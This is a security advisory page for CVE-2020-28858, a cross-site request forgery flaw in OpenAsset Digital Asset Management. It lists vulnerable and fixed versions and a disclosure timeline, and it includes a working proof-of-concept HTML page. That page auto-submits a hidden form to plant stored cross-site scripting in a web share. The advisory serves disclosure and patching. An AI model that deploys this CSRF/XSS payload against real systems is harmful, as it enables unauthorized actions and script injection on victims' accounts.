exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

OpenAsset Digital Asset Management Cross Site Request Forgery

OpenAsset Digital Asset Management Cross Site Request Forgery
Posted Dec 11, 2020
Authored by Jack Misiura

OpenAsset Digital Asset Management suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
advisories | CVE-2020-28858
SHA-256 | 078180c0088a10bb5564b3436104fdcc80f9d53548b5cf7063cb5edac1d63305

OpenAsset Digital Asset Management Cross Site Request Forgery

Change Mirror Download
Title: Cross-site request forgery (CSRF)



Product: OpenAsset Digital Asset Management by OpenAsset



Vendor Homepage: https://www.openasset.com/



Vulnerable Version: 12.0.19 (Cloud) 11.2.1 (On-premise)



Fixed Version: 12.0.26 (Cloud) 11.4.10 (On-premise)



CVE Number: CVE-2020-28858



Author: Jack Misiura from The Missing Link



Website: https://www.themissinglink.com.au



Timeline:



2020-11-14 Disclosed to Vendor

2020-12-04 Vendor releases final patches

2020-12-10 Publication



1. Vulnerability Description



The OpenAsset Digital Asset Management web application was vulnerable to cross-site request forgery because it did not verify whether a request made to itself was intentionally made by the user. All actions performed by the user's navigating the site, including all administrative user actions were found to be vulnerable.



2. PoC



While all endpoints are vulnerable, the best attack involves using the web share functionality, to introduce a stored XSS through CSRF. The web shares are shared with third parties by application users. To perform the attack, the following HTML page can be hosted on an attacker controlled site:



<html>

<body>

CSRF / Stored XSS Attack Demo - WebShares

<iframe src="https://target-site.com/404page/123" name="targetFrame" style="display:none">

</iframe>

<form id="myEvilForm" name="submit" action="https://target-site.com/AJAXPage/EditDownload" target="targetFrame" method="POST" style="display:none">

<input type="text" name="code" value="CODE GOES HERE"><br/>

<input type="text" name="name" value="Test<script>alert("CSRF and XSS attack!");</script>"><br/>

<input type="text" name="description" value="SharedFolder"><br/>

<input type="text" name="expires" value="1"><br/>

<input type="text" name="expiryDate" value="12-12-2030"><br/>

<input type="text" name="maximumDownloads" value=""><br/>

<input type="text" name="notifyEveryDownload" value="1"><br/>

<input type="text" name="alive" value="on"><br/>

<input type="text" name="action" value="submit"><br/>

<input type="submit" value="Submit"><br/>

</form>

</body>

<script>

alert("Ready to submit CSRF attack.");

myEvilForm.submit();

alert("Done.");

</script>

</html>



The code value must be replaced with the appropriate web share code - this is acquired when the web share is sent to the unauthenticated third parties. The attacker only needs to convince the user who sent the original web share information out to visit the example site.



3. Solution



The vendor provides an updated version (11.4.10) which should be installed immediately. If using the cloud version, the vendor has already updated it.



4. Advisory URL



https://www.themissinglink.com.au/security-advisories
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    19 Files
  • 23
    Jul 23rd
    17 Files
  • 24
    Jul 24th
    47 Files
  • 25
    Jul 25th
    31 Files
  • 26
    Jul 26th
    13 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    27 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close